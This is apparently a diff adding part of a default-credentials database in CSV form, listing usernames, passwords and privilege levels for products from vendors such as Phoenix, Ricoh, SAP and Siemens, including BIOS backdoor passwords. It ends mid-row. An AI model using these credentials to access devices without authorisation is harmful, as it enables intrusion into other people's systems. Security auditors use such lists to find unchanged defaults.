+phoenix,4.0,6.0.2,Multi,,admin,Admin,, +phoenix,PC BIOS,,console,,BIOS,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,CMOS,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,PHOENIX,Admin,Default/backdoor CMOS password, +phoenix,PC BIOS,,console,,phoenix,Admin,Default/backdoor CMOS password, +phoenix,Phoenix v1.14,,Multi,Administrator,admin,Admin,, +phpreactor,PHPReactor,,1.2.7,core,phpreactor,,, +phpreactor,PHPReactor,1.2.7,http,core,phpreactor,,, +phptest,phpTest,,0.5.6,admin,1234,,, +phptest,phpTest,,0.5.6,guest,guest,,, +phptest,phpTest,0.5.6,http,admin,1234,Admin,, +phptest,phpTest,0.5.6,http,guest,guest,,, +pirelli,,,,on,on,Admin,Used for OnTelecom, +pirelli,AGE ADSL Router,,Multi,admin,microbusiness,Admin,, +pirelli,AGE ADSL Router,,Multi,user,password,User,, +pirelli,DRG A225G,,,3play,3play,admin,, +pirelli,DRG A225G,SAPO,192.168.1.1,user,user,admin,, +pirelli,PRGAV4202N,,10.0.0.138,Telek0m,Austria&Eur0,,for Telekom Austria, +pirelli,Pirelli AGE-SB,,HTTP,admin,smallbusiness,Admin,, +pirelli,Pirelli AGE-UB,,HTTP,admin,microbusiness,Admin,, +pirelli,Pirelli Router,,Multi,admin,microbusiness,Admin,, +pirelli,Pirelli Router,,Multi,admin,mu,Admin,, +pirelli,Pirelli Router,,Multi,user,password,Admin,, +plaintree,Waveswitch,,,,default.password,,, +planet,ADE-4000,,Multi,admin,epicrouter,Admin,, +planet,ADE-4110,,HTTP,admin,epicrouter,Admin,, +planet,Adsl router,,,admin,epicrouter,,, +planet,Adsl router,,Multi,admin,epicrouter,,, +planet,Akcess Point,,HTTP,admin,admin,Admin,, +planet,FGSW-2402RS,,serial,admin,ISPMODE,Admin,, +planet,FNSW-2402S,,,admin, just hit ENTER ,,, +planet,FNSW-2402S,,Console,admin,<> just hit ENTER,,, +planet,GRT-501,,http,root,root,full,, +planet,WAP-1900/1950/2000,,2.5.0,,default,,, +planet,WAP-1900/1950/2000,,Admin,,default,,, +planet,WAP-1900/1950/2000,2.5.0,Multi,,default,Admin,, +planet,XRT-401D,,HTTP,admin,1234,Admin,, +pollsafe,Pollsafe,,,SMDR,SECONDARY,,, +pollsafe,Pollsafe,,modem,SMDR,SECONDARY,,, +polycom,SoundPoint IP 601,,,Polycom,456,Device Admin (Web),Admin credentials for Web interface, +polycom,Soundpoint VoIP phones,,HTTP,Polycom,SpIp,User,, +polycom,Soundstation IP 3000,,http,administrator,**#,Admin,, +polycom,ViewStation 4000,,v.35,,,,, +polycom,ViewStation 4000,3.5,Multi,,admin,Admin,, +polycom,ViewStation 4000,3.5,Multi,,x6zynd56,update software,, +polycom,iPower 9000,,Multi,,,Admin,, +postgresql,PostgreSQL,,,postgres,,,, +postgresql,PostgreSQL,,CLI,postgres,,Administrator,, +powerchute,UPS,,,pwrchute,pwrchute,,, +prestige,650,,,admin,1234,Admin,, +prestigio,Nobile,156,Multi,,,Admin,, +prime,PrimeOS,,,dos,dos,,, +prime,PrimeOS,,,fam,fam,,, +prime,PrimeOS,,,guest,guest,,, +prime,PrimeOS,,,guest1,guest,,, +prime,PrimeOS,,,mail,mail,,, +prime,PrimeOS,,,maint,maint,,, +prime,PrimeOS,,,mfd,mfd,,, +prime,PrimeOS,,,netlink,netlink,,, +prime,PrimeOS,,,prime,prime,,, +prime,PrimeOS,,,primenet,primeos,,, +prime,PrimeOS,,,primeos,primeos,,, +prime,PrimeOS,,,primos_cs,prime,,, +prime,PrimeOS,,,system,prime,,, +prime,PrimeOS,,,system,system,,, +prime,PrimeOS,,,tele,tele,,, +prime,PrimeOS,,,test,test,,, +prime,PrimeOS,,Admin,system,prime,,, +prime,PrimeOS,,Admin,system,system,,, +prime,PrimeOS,,Multi,dos,dos,User,, +prime,PrimeOS,,Multi,fam,fam,User,, +prime,PrimeOS,,Multi,guest,guest,User,, +prime,PrimeOS,,Multi,guest1,guest,User,, +prime,PrimeOS,,Multi,guest1,guest1,User,, +prime,PrimeOS,,Multi,mail,mail,User,, +prime,PrimeOS,,Multi,maint,maint,User,, +prime,PrimeOS,,Multi,mfd,mfd,User,, +prime,PrimeOS,,Multi,netlink,netlink,User,, +prime,PrimeOS,,Multi,prime,prime,User,, +prime,PrimeOS,,Multi,prime,primeos,User,, +prime,PrimeOS,,Multi,primenet,primenet,User,, +prime,PrimeOS,,Multi,primenet,primeos,User,, +prime,PrimeOS,,Multi,primeos,prime,User,, +prime,PrimeOS,,Multi,primeos,primeos,User,, +prime,PrimeOS,,Multi,primos_cs,prime,User,, +prime,PrimeOS,,Multi,primos_cs,primos,User,, +prime,PrimeOS,,Multi,system,prime,Admin,, +prime,PrimeOS,,Multi,system,system,Admin,, +prime,PrimeOS,,Multi,tele,tele,User,, +prime,PrimeOS,,Multi,test,test,User,, +prime,PrimeOS,,User,guest,guest,,, +prime,PrimeOS,,User,guest1,guest,,, +prime,PrimeOS,,User,guest1,guest1,,, +prime,PrimeOS,,User,mail,mail,,, +prime,PrimeOS,,User,mfd,mfd,,, +prime,PrimeOS,,User,netlink,netlink,,, +prime,PrimeOS,,User,prime,prime,,, +prime,PrimeOS,,User,primenet,primenet,,, +prime,PrimeOS,,User,primenet,primeos,,, +prime,PrimeOS,,User,primos_cs,prime,,, +prime,PrimeOS,,User,primos_cs,primos,,, +prime,PrimeOS,,User,tele,tele,,, +prime,PrimeOS,,User,test,test,,, +primebase,SQL Database Server,,4.2,Administrator,,,, +primebase,SQL Server,4.2,,Administrator,,,, +prolite,Tru-Color II,version 5,Remote Control,,,,, +prolite,Tru-Color II,version 6,Remote Control,,,,, +prolite,Tru-Color XP,version 8,Remote Control,,,,, +promise,FastTrak TX4310,,HTTP,admin,admin,admin,, +promise,FastTrak TX4310,,admin,admin,admin,,, +prostar,1224,,,,4321,,, +prostar,1224,,Other,,4321,,, +protocraft,authentic train whistle,,,musi1921,Musi%1921,,, +proxim,AP-2000,,,,public,,, +proxim,AP-2000,,,,public,Admin,, +proxim,ORINOCO AP-4000M,802.11A+B/G,http://192.168.1.52/,no se,no se ,no se,se me perdio el pass quiero recuperarlo, +proxim,ORiNOCO AP-600,,http://169.254.128.132,,public,Administration,, +proxim,ORiNOCO AP-600,all version,192.168.0.2,,,admin,, +proxim,ORiNOCO AP-700,,http://169.254.128.132,,public,Administration,, +proxim,Orinoco 600/2000,All,HTTP,,,Admin,WLAN accesspoint, +proxim,Tsunami MP.11 5054-R SN-07UT08570142,v2.5.1(215) ,TELNET/HTTP,,public,admin,, +psionteklogix,9150,,HTTP,support,h179350,Admin,, +pyramid computer,BenHur,,Admin,admin,admin,,, +pyramid computer,BenHur,,Admin,admin,gnumpf,,, +pyramid computer,BenHur,,all,admin,admin,,, +pyramidcomputer,BenHur,all,HTTP,admin,admin,Admin,, +pyramidcomputer,BenHur,all,HTTP,admin,gnumpf,Admin,, +qdi,Broadband Gateway 100,,,,password,,, +qdi,Broadband Gateway 100,,Admin,,password,,, +qdi,Broadband Gateway 100,,Telnet/HTTP,,password,Admin,, +qdi,PC BIOS,,,,QDI,,, +qdi,PC BIOS,,Admin,,QDI,,, +qdi,PC BIOS,,Console,,QDI,Admin,, +qdi,SpeedEasy BIOS,,,,lesarotl,,, +qdi,SpeedEasy BIOS,,Admin,,lesarotl,,, +qdi,SpeedEasy BIOS,,Console,,lesarotl,Admin,, +qtec,790RH,,http://192.168.1.1,Admin,,Administration,, +quake,Quake Server,,,,tms,,rcon password; appears to require that you masquerade as 192.246.40.* to use, +qualiteam,X-Cart,,,master,master,,, +quantex,PC BIOS,,,,xljlbj,,, +quantex,PC BIOS,,Admin,,teX1,,, +quantex,PC BIOS,,Admin,,xljlbj,,, +quantex,PC BIOS,,Console,,teX1,Admin,, +quantex,PC BIOS,,Console,,xljlbj,Admin,, +quantum,File Servers,,Most of them,,,,, +quantum,File Servers,,User,,,,, +quantum,File Servers,Most of them,HTTP,,,User,, +quintumtechnologiesinc,Tenor Series,all,Multi,admin,admin,Admin,, +radio shack,TAD-1004,,keypad,,744,,, +radioshack,In-Store Demo PC Windows Screen Savers,,,,,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +radioshack,In-Store Demo PC Windows Screen Savers,,,,RS,Windows User,Get the store number from a receipt for something you bought there. The store number may also be in the phone book., +radioshack,TAD-1004,,Multi,,744,keypad,, +radware,Linkproof,,ssh,lp,lp,Admin,, +radware,Linkproof,3.73.03,Multi,radware,radware,Admin,, +raidzone,raid arrays,,,,raidzone,,, +rainbow,IKEY 1000,,,,rainbow,Admin,, +rainbow,IKEY 2000,,,,PASSWORD,,, +rainbow,IKEY,,1000,,rainbow,,, +rainbow,IKEY,,2000,,PASSWORD,,, +ramp networks,WebRamp,,,wradmin,trancell,,, +rampnetworks,WebRamp,,,wradmin,trancell,,, +rapidstream,RS4000-RS8000,,,rsadmin,rsadmin,,Linux, +rapidstream,RapidStream Appliances,,,rsadmin,,,, +raritan,KVM Switches,,,admin,raritan,,, +raritan,KVM Switches,,,admin,raritan,Admin,, +raytalk,RB-300,,,root,root,,, +raytalk,RB-300,,,root,root,Admin,, +rca,DCW615R,,http://192.168.100.1 or http://192.168.0.1,,admin,Administration,, +redhat,Redhat 6.2,,,piranha,piranha,,, +redhat,Redhat 6.2,,,piranha,q,,, +redhat,Redhat 6.2,,HTTP,piranha,piranha,User,, +redhat,Redhat 6.2,,HTTP,piranha,q,User,, +redhat,Redhat 6.2,,User,piranha,piranha,,, +redhat,Redhat 6.2,,User,piranha,q,,, +redline,,,,user,user,192.168.25.2,, +redline,an50,,,admin,admin,,, +redline,an50,02.02,Multi,admin,admin,,, +remedy,Remedy,,,ARAdmin,AR#Admin#,,, +remedy,Remedy,,Multi,Demo,,,, +remedy,Remedy,,multi,ARAdmin,AR#Admin#,Admin,, +remedy,Remedy,,multi,Demo,,,, +research machines,Classroom Assistant,,,manager,changeme,,, +research,PC BIOS,,,,Col2ogro2,,, +research,PC BIOS,,Admin,,Col2ogro2,,, +research,PC BIOS,,Console,,Col2ogro2,Admin,, +researchmachines,Classroom Assistant,,,manager,changeme,,Windows 95, +resumix,Resumix,,,root,resumix,,, +ricoh,1013F,,,,sysadm,,, +ricoh,1224c,,http,,password,,, +ricoh,1232c,-,http,admin,password,admin,, +ricoh,1301f,,,,sysadm,,, +ricoh,2035e,,web,admin,password,,no entry ta administrator, +ricoh,2060,,HTTP,admin,,Admin,, +ricoh,2500,,,admin,blank,admin,, +ricoh,3245C,,,admin,blank,admin,, +ricoh,650,,,,sysadm,http,, +ricoh,AP410N,1.13,HTTP,admin,,Admin,, +ricoh,AP610N,,telnet,admin,,admin,, +ricoh,Aficio 1013 1515 2013 120,,,sysadm,sysadm,,, +ricoh,Aficio 1022,,,Admin,password,,, +ricoh,Aficio 1027,,http://,admin,password,admin,, +ricoh,Aficio 1045,,HTTP,admin,password,,, +ricoh,Aficio 2015,,http,admin,password,,, +ricoh,Aficio 2018D,,http,admin,password,Admin,, +ricoh,Aficio 2020D,,HTTP,admin,password,Admin,, +ricoh,Aficio 2035,,,sisadm,password,,, +ricoh,Aficio 2045e,,http,admin,password,Admin,, +ricoh,Aficio 2075,,,admin,,Admin,, +ricoh,Aficio 2228c,,Multi,sysadmin,password,Admin,Webpage admin, +ricoh,Aficio 2232C,,Telnet,,password,Admin,, +ricoh,Aficio 3025,,,admin,,Admin,, +ricoh,Aficio 3035,,,admin,,Admin,, +ricoh,Aficio 3228,,,admin,,Admin,, +ricoh,Aficio AP3800C,2.17,HTTP,,password,Admin,alternative to sysadmin and Admin, +ricoh,Aficio MP 171,,http or telnet,admin,,,, +ricoh,Aficio MP 2000,,,admin,,root acces,, +ricoh,Aficio MP 2500,1.03,HTTP,admin,,Administrator,, +ricoh,Aficio MP 2550,,web interface,admin,,admin,, +ricoh,Aficio MP 3350,,,admin,,administrator,, +ricoh,Aficio MP 4500,,,admin,,,, +ricoh,Aficio MP 5500,2.08,Telnet / HTTP,admin,,Admin,, +ricoh,Aficio MP C2050,,,admin,,Administrator,, +ricoh,Aficio MP C2800,,,admin,,,, +ricoh,Aficio MP C4000,,,admin,,,, +ricoh,Aficio MP C4500,,HTTP,admin,,admin,, +ricoh,Aficio SP 4210N,,Web Interface,admin,,,, +ricoh,Aficio SP C220N,,http,Admin,,,case sensitive must have upper case A, +ricoh,Aficio,1515,http,administrator,password,administrator access,, +ricoh,Aficio,2027,,admin,password,,, +ricoh,Aficio,AP3800C,HTTP,sysadmin,password,Admin,, +ricoh,Aficio,CL100N,Web,admin,password,,, +ricoh,Aficioh,,Administrator,admin,,,, +ricoh,Africo MP 161,,Telnet/HTTP,admin,,Administrator,, +ricoh,C231N,,,Admin,password,,A must be capitalized in username, +ricoh,CL2000N,,,admin,password,,, +ricoh,CL3500N,,GUI,admin,leave blank,,, +ricoh,DSC338 Printer,1.19,HTTP,,password,Admin,no user, +ricoh,MFP 2550,,web interface,admin,,admin,, +ricoh,MP 161SPF,,Http://,admin,,,, +ricoh,MP 7500,2.02.1,HTTP,admin,,Admin,Webpage admin, +ricoh,MP 9000,,,admin,sem senha,webpage,somente as de fabrica, +ricoh,MP C4000,,http,admin,,Admin Access,, +ricoh,MP C6000,,HTTP,admin,N/A,Web admin,, +ricoh,MP4000,,web,admin,,,, +ricoh,SP 4100N,,web interface,admin,,,leave password black, +ricoh,SP C232DN,,,Admin,password,,note A is capitalized, +ricoh,SP C311N,,HTTP,Admin,,Config.-Admin,Username is case-sensitive, +ricoh,SP C311N,,http,Admin,,,, +ricoh,SP C311N,,http,Admin,password,,, +ricoh,SPC232,all versions,http,Admin,,admin,, +ricoh,afcio mp 161,,telnet http,admin,,,, +ricoh,aficio 650 windows xp,all versions,http//192.168.1.4,,,admin,, +riverbed,Acelerador,,http,Admin,password,,, +rizen,WebGUI,,,Admin,123qwe,,, +rizen,WebGUI,,,Admin,123qwe,Admin,, +rm,RM Connect,,,RMUser1,password,,, +rm,RM Connect,,,admin,rmnetlm,,, +rm,RM Connect,,,admin2,changeme,,, +rm,RM Connect,,,adminstrator,changeme,,, +rm,RM Connect,,,deskalt,password,,, +rm,RM Connect,,,deskman,changeme,,, +rm,RM Connect,,,desknorm,password,,, +rm,RM Connect,,,deskres,password,,, +rm,RM Connect,,,guest,,,, +rm,RM Connect,,,replicator,replicator,,, +rm,RM Connect,,,setup,changeme,,, +rm,RM Connect,,,teacher,password,,, +rm,RM Connect,,,temp1,password,,, +rm,RM Connect,,,topicalt,password,,, +rm,RM Connect,,,topicnorm,password,,, +rm,RM Connect,,,topicres,password,,, +rm,RM Connect,,Main Login,PROPAGATE,APPLICATION,Full,used in school, +rm,RM Connect,,Multi,RMUser1,password,,, +rm,RM Connect,,Multi,admin,rmnetlm,,, +rm,RM Connect,,Multi,admin2,changeme,,, +rm,RM Connect,,Multi,adminstrator,changeme,,, +rm,RM Connect,,Multi,deskalt,password,,, +rm,RM Connect,,Multi,deskman,changeme,,, +rm,RM Connect,,Multi,desknorm,password,,, +rm,RM Connect,,Multi,deskres,password,,, +rm,RM Connect,,Multi,guest,,,, +rm,RM Connect,,Multi,replicator,replicator,,, +rm,RM Connect,,Multi,setup,changeme,,, +rm,RM Connect,,Multi,teacher,password,,, +rm,RM Connect,,Multi,temp1,password,,, +rm,RM Connect,,Multi,topicalt,password,,, +rm,RM Connect,,Multi,topicnorm,password,,, +rm,RM Connect,,Multi,topicres,password,,, +rm,RM Connect,,Propagating!,PROPAGATE,APPLICATION,Full,used in school, +rm,Server BIOS,,,,RM,,, +rm,Server BIOS,,Console,,RM,,, +rm,computer,,Other,administrator,password/changeme or secret,l:/ and take of restrictions,, +rnn,RNN's Guestbook,1.2,http,admin,demo,Admin,, +roamabout,RoamAbout R2 Wireless Access Platform,,Multi,admin,password,Admin,, +rodopi,Rodopi billing software 'AbacBill' sql database,,,rodopi,rodopi,,, +rodopi,Unknown,,,Rodopi,Rodopi,,, +safecom,Router,,Admin,admin,epicrouter,,, +safecom,Router,,Multi,admin,epicrouter,Admin,, +sagem,F@ST ,2404,Telnet , SSH , HTTP,admin,administrator, +sagem,Fast 1200 (Fast 1200),,Telnet,root,1234,User,root/1234, +sagem,Fast 1400,,Multi,admin,epicrouter,Admin,, +sagem,Fast 1400w,,Multi,root,1234,Admin,, +sambar technologies,Sambar Server,,,admin,,,, +sambar technologies,Sambar Server,,,anonymous,,,, +sambar technologies,Sambar Server,,,billy-bob,,,, +sambar technologies,Sambar Server,,,ftp,,,, +sambar technologies,Sambar Server,,,guest,guest,,, +sambartechnologies,Sambar Server,,http,admin,,Admin,, +sambartechnologies,Sambar Server,,http,anonymous,,,, +sambartechnologies,Sambar Server,,http,billy-bob,,,, +sambartechnologies,Sambar Server,,http,ftp,,Admin,, +sambartechnologies,Sambar Server,,http,guest,guest,Admin,, +samsung,AHT-E300,Multi,admin,password,Admin,,, +samsung,E700,,Password,Moeketsik,874434,,, +samsung,N620,,Multi,,,Admin,, +samsung,SGH E700,,,,874434,User,Sms, +samsung,SGH E700,,,Samsung,,,Sms, +samsung,SWL-3500RG,2.15,HTTP,public,public,Admin,def. WEP keys: 0123456789 1518896203, +samuel abels,Ammerum,,0.6-1,user,password,,, +samuelabels,Ammerum,0.6-1,,user,password,,, +sap,Business Connector,,4.7,Administrator,manage,,, +sap,Business Connector,,4.7,Developer,isdev,,, +sap,Business Connector,,4.7,Replicator,iscopy,,, +sap,Business Connector,4.7,,Administrator,manage,Admin,, +sap,Business Connector,4.7,,Developer,isdev,Admin,, +sap,Business Connector,4.7,,Replicator,iscopy,Admin,, +sap,ITS,,,itsadmin,init,,, +sap,SAP Local Database,,,SAPR3,SAP,,, +sap,SAP,,,DDIC,19920706,,, +sap,SAP,,,EARLYWATCH,SUPPORT,,, +sap,SAP,,,SAP*,7061992,,, +sap,SAP,,,SAPCPIC,ADMIN,,, +sap,SAP,,000 001 066,SAP*,06071992,,, +sap,SAP,,000 001,DDIC,19920706,,, +sap,SAP,,000,SAPCPIC,ADMIN,,, +sap,SAP,,066,EARLYWATCH,SUPPORT,,, +sap,SAP,,Admin,SAPCPIC,ADMIN,,, +sap,SAP,,Mandant 066,SAP,SAP internal,,, +sap,SAP,,R/3,DDIC,19920706,,, +sap,SAP,,R/3,EARLYWATCH,SUPPORT,,, +sap,SAP,,R/3,SAP*,06071992,,, +sap,SAP,,R/3,SAPCPIC,ADMIN,,, +sap,SAP,,R/3,TMSADM,,,, +sap,SAP,,SAP internal,DDIC,19920706,,, +sap,SAP,,SAP internal,EARLYWATCH,SUPPORT,,, +sap,SAP,,SAP internal,SAP*,07061992,,, +sap,SAP,,SAP internal,SAP*,PASS,,, +sap,SAP,R/3,,SAP*,06071992,,, +sap,SAP,R/3,,TMSADM,,,, +sap,SAP,R/3,SAP client,DDIC,19920706,SAP internal; Mandant 001,, +sap,SAP,R/3,SAP client,EARLYWATCH,SUPPORT,SAP internal; Mandant 066,, +sap,SAP,R/3,SAP client,SAP*,07061992,SAP internal; Mandant 066,, +sap,SAP,R/3,SAP client,SAP*,PASS,SAP internal; all Mandants,, +sap,SAP,R/3,SAP client,SAPCPIC,ADMIN,Admin,, +savin,C2525,,HTTP,admin,blank,Admin,, +schneider electric,PowerLogic Ethernet Communications Card,,,,admin,,, +schneiderelectric,PowerLogic ethernet card,,http,,admin,Admin,, +scientificatlanta,2100,comcast-supplied,http,admin,w2402,diagnostics page,192.168.100.1, +scientificatlanta,2320,,http://192.168.0.1./,admin,W2402,,, +scientificatlanta,2320,,http://192.168.100.1,,,,, +scientificatlanta,DPR2325R3,3.0,192.168.0.1,admin,W2402,Admin,, +scientificatlanta,DPX2100,Comcast-supplied,HTTP,admin,w2402,diagnostics page,192.168.100.1, +scientificatlanta,EPC2100R2,HW Rev 2.1,modem,,,admin,, +scientificatlanta,EPC2505,1.0,http://192.168.100.1,admin,W2402,status,, +scientificatlanta,EPR2320R2,2.0,192.168.0.1,,Admin,,, +scientificatlanta,EPR2320R2,v2.0.2r1262-070212,192.168.0.1,admin,admin,admin,nao consigo entra no router, +scientificatlanta,EPR2325R3,3.0,http://192.168.100.1,admin,admin,admin,, +scientificatlanta,SERVICE ELECTRIC CABLE (SECABLE),SERVICE ELECTRIC CABLE (SECABLE),http://192.168.100.1/,admin,W2402,Status,Status Page, +scientificatlanta,WebSTAR EPC2100R2, 2.0,192.168.100.1,Sremac,b29a03t19a87ja,rasalav,, +scientificatlanta,epr2325r3,all,http://192.168.100.1/,,,Admin,, +seagullscientific,Track'Em,,,ADMIN,admin,Admin,, +seagullscientific,Track'Em,,,USER,USER,Admin,, +securicor3net,Cezanne,,,manager,friend,,, +securicor3net,Cezzanne,,,manager,friend,,any, +securicor3net,Monet,,,manager,friend,,any, +security.org,lockpicking,,,admin,,,, +securstar,ikey,,admin,admin,rainbow,,, +securstar,ikey,1000,Multi,admin,rainbow,admin,, +semaphore,PICK O/S,,,DESQUETOP,,,, +semaphore,PICK O/S,,,DS,,,, +semaphore,PICK O/S,,,DSA,,,, +semaphore,PICK O/S,,,PHANTOM,,,, +senao,2611CB3+D (802.11b Wireless AP),,HTTP,admin,,Admin,Default IP: 192.168.1.1, +server technology,Sentry Remote Power Manager,,,ADMN,admn,,, +server technology,Sentry Remote Power Manager,,,GEN1,gen1,,, +server technology,Sentry Remote Power Manager,,,GEN2,gen2,,, +server technology,Sentry Remote Power Manager,,Admin,ADMN,admn,,, +server technology,Sentry Remote Power Manager,,view/control,GEN1,gen1,,, +server technology,Sentry Remote Power Manager,,view/control,GEN2,gen2,,, +servertechnology,Sentry Remote Power Manager,,Multi,ADMN,admn,Admin,Telnet port 2001, +servertechnology,Sentry Remote Power Manager,,Multi,GEN1,gen1,view/control,Telnet port 2001, +servertechnology,Sentry Remote Power Manager,,Multi,GEN2,gen2,view/control,Telnet port 2001, +sgi,Embedded Support Partner,,,Administrator,Partner,,IRIX 6.5.6, +sgi,IRIX,,,EZsetup,,,ALL, +sgi,IRIX,,,lp,lp,,ALL, +sgi,all,,,root,,,all, +sharp,AR-201,,http,,sysadm,,, +sharp,AR-280,,Full,,sysadm,,, +sharp,AR-280,,HTTP,,sysadm,Full,, +sharp,AR-336,,HTTP,,sysadm,admin,, +sharp,AR-336,,admin,,sysadm,,, +sharp,AR-407/S402 ,,Multi,,,Admin,, +sharp,AR-M205,,Web,admin,Sharp,full,, +sharp,AR-M257,,WEB Interface,admin,Sharp,,, +sharp,AR-M355N,,,admin,Sharp,Admin,, +sharp,AR-M550,,,admin,Sharp,HTTP,, +sharp,AR507/S507,,HTTP,,sysadm,,, +shiva,AccessPort,,,hello,hello,,, +shiva,AccessPort,,,hello,hello,,Any, +shiva,Any?,,,Guest,blank,,, +shiva,Integrator,,Admin,admin,hello,,, +shiva,Integrator,150/200/500,Multi,admin,hello,Admin,, +shiva,LanRover,,,guest,,,, +shiva,LanRover,,,root,,,, +shiva,ShivaPort,,console,admin,hello,Admin,, +shoretel,Conference Bridge,,,Admin,admin1,,, +shoretel,ShoreTel Call Manager,,,admin,changeme,,, +shoretel,ShoreWare Director,,,admin,changeme,,, +shuttle,PC BIOS,,,,Spacve,,, +shuttle,PC BIOS,,,,Spacve,Admin,, +shuttle,PC BIOS,,Admin,,Spacve,,, +siemens nixdorf,Hicom 100E PBX,,,31994,31994,,, +siemens nixdorf,Hicom 150E PBX,,,31994,31994,,, +siemens nixdorf,PBX,,8818,,uboot,,, +siemens nixdorf,PC BIOS,,,,SKY_FOX,,, +siemens nixdorf,PC BIOS,,Admin,,SKY_FOX,,, +siemens nixdorf,PhoneMail,,,poll,poll,,, +siemens nixdorf,PhoneMail,,,sysadmin,sysadmin,,, +siemens nixdorf,PhoneMail,,,system,system,,, +siemens nixdorf,PhoneMail,,,tech,tech,,, +siemens nixdorf,ROLM PBX,,,admin,pwp,,, +siemens nixdorf,ROLM PBX,,,eng,engineer,,, +siemens nixdorf,ROLM PBX,,,op,operator,,, +siemens nixdorf,ROLM PBX,,,su,super,,, +siemens,5940 T1E1 Router,5940-001 v6.0.180-2,Telnet,superuser,admin,Admin,, +siemens,APACS,,ACM Controller,,gubed,,, +siemens,Gigaset SX541 WLAN dsl,,http://192.168.2.1,,admin,Admin,, +siemens,HiPath 3000,,,31994,31994,,, +siemens,HiPath 3000,,Manager,office,office,,, +siemens,HiPath 3000,,Multi,31994,31994,,, +siemens,Optipoint,,,,123456,,, +siemens,Optipoint,,Multi,,123456,,, +siemens,PC BIOS,,,,SKY_FOX,CMOS,, +siemens,PhoneMail,,,poll,tech,,, +siemens,PhoneMail,,,sysadmin,sysadmin,,, +siemens,PhoneMail,,,tech,tech,,, +siemens,Phonemail,,,tech,field,,, +siemens,Phonemail,,Multi,tech,field,,, +siemens,QUADLOG,,CCM Controller,,gubed,,, +siemens,ROLM PBX,,,admin,pwp,,, +siemens,ROLM PBX,,,eng,engineer,,, +siemens,ROLM PBX,,,op,op,,, +siemens,ROLM PBX,,,op,operator,,, +siemens,ROLM PBX,,,su,super,,, +siemens,SE515,,,admin,,,, +siemens,SE515,,HTTP,admin,,,, +siemens,Siemens Nixdorf 8818 PBX,,,,uboot,,, +siemens,Siemens Nixdorf Hicom 100E PBX,,,31994,31994,,, +siemens,Siemens Nixdorf Hicom 150E PBX,,,31994,31994,,, +siemens,Siemens Nixdorf PC BIOS,,Console,,SKY_FOX,Admin,, +siemens,Siemens Pro C5,,Multi,,,Admin,, +siemens,SpeedStream 4100,,HTTP,admin,hagpolm1,Admin,DSL Modem and Router, +siemens,WinCC,,,WinCCAdmin,2WSXcde.,,, +siemens,WinCC,,,WinCCConnect,2WSXcder,,, +siemens,hipath,,,,,,, +siemens,hipath,,Admin,,,,, +siemens,hipath,,Multi,,,Admin,, +sigma,Sigmacoma IPshare,Sigmacom router v1.0,HTTP,admin,admin,Admin,, +sigmatel,s3+,s3+,,,1221,,can be change, +siips,Trojan,,8974202,Administrator,ganteng,,, +siips,Trojan,,Admin,Administrator,ganteng,,, +siips,Trojan,8974202,Multi,Administrator,ganteng,Admin,, +siips,Trojan,8974202,Multi,Administrator,ganteng,Admin,Thx, +silextechnology,PRICOM (Printserver),,Multi,root,,Admin,for telnet / HTTP, +silicon graphics,IRIX,,,4Dgifts,,,, +silicon graphics,IRIX,,,6.x,,,, +silicon graphics,IRIX,,,Ezsetup,,,, +silicon graphics,IRIX,,,OutOfBox,,,, +silicon graphics,IRIX,,,demos,,,, +silicon graphics,IRIX,,,field,field,,, +silicon graphics,IRIX,,,tour,tour,,, +silicon graphics,IRIX,,,tutor,,,, +silicon graphics,IRIX,,5.x 6.x,guest,,,, +silicon graphics,IRIX,,5.x 6.x,lp,,,, +silicon graphics,IRIX,,Admin,4Dgifts,,,, +silicon graphics,IRIX,,Admin,4Dgifts,4Dgifts,,, +silicon graphics,IRIX,,Admin,Ezsetup,,,, +silicon graphics,IRIX,,Admin,OutOfBox,,,, +silicon graphics,IRIX,,Admin,demos,,,, +silicon graphics,IRIX,,Admin,field,field,,, +silicon graphics,IRIX,,Admin,tour,tour,,, +silicon graphics,IRIX,,Admin,tutor,,,, +silicon graphics,IRIX,,Admin,tutor,tutor,,, +silicon graphics,IRIX,,CLI,guest,,,, +silicon graphics,IRIX,,CLI,lp,,,, +silicongraphics,IRIX,,Multi,4Dgifts,,Admin,, +silicongraphics,IRIX,,Multi,4Dgifts,4Dgifts,Admin,, +silicongraphics,IRIX,,Multi,Ezsetup,,Admin,, +silicongraphics,IRIX,,Multi,OutOfBox,,Admin,, +silicongraphics,IRIX,,Multi,demos,,Admin,, +silicongraphics,IRIX,,Multi,field,field,Admin,, +silicongraphics,IRIX,,Multi,tour,tour,Admin,, +silicongraphics,IRIX,,Multi,tutor,,Admin,, +silicongraphics,IRIX,,Multi,tutor,tutor,Admin,, +silicongraphics,IRIX,5.x 6.x,Multi,guest,,CLI; UID guest,, +silicongraphics,IRIX,5.x 6.x,Multi,lp,,CLI; UID lp,, +sipura,SPA-3000,,prot:,admin,admin,Administration,, +sitara,qosworks,,Console,root,,Admin,, +site interactive,Auction Weaver Lite,,,admin,pass,,, +sitecom,All WiFi routers,,Multi,,sitecom,Admin,, +sitecom,DC-207,,,admin,admin,Admin,, +sitecom,WL-108,,,admin,password,Admin,, +sitecom,WL-109,,,admin,password,Admin,, +sitecom,WL-114v2,,,admin,admin,Admin,, +sitecom,WL-122,,,,sitecom,Admin,, +sitecom,WL-607,,http://192.168.0.1,admin,admin,,, +sitecom,WR-1133,,,,damin,Admin,, +sitecom,wl-108,,192.168.0.1,,,,, +siteinteractive,Auction Weaver Lite,,,admin,pass,Admin,, +smartbridges,airBridge,,admin,admin,public,,, +smartbridges,airBridge,2.x,Multi,admin,public,admin,, +smartswitch,Router 250 ssr2500,,Admin,admin,,,, +smartswitch,Router 250 ssr2500,,v3.0.9,admin,,,, +smartswitch,Router 250 ssr2500,v3.0.9,Multi,admin,,Admin,, +smc,2804WR,,HTTP,,smcadmin,Admin,, +smc,7004FW,,Admin,,,,, +smc,7004FW,,HTTP,,,Admin,, +smc,7004VBR,V.2,http://192.168.2.1.,,smcadmin,Admin,192.168.2.1., +smc,7204BRA,,HTTP,smc,smcadmin,web,, +smc,7204BRA,,Multi,smc,smcadmin,Admin,, +smc,7204bra,,web,smc,smcadmin,,, +smc,7401BRA,1,HTTP,admin,barricade,Admin,, +smc,7401BRA,2,HTTP,smc,smcadmin,Admin,, +smc,7901W/BRA,,,admin,smcadmin,,, +smc,7901W/BRA,,HTTP,admin,smcadmin,,, +smc,7901W/BRA,,Multi,admin,smcadmin,,, +smc,8014,Comcast,,cusadmin,highspeed,Admin,, +smc,Barricade 7004 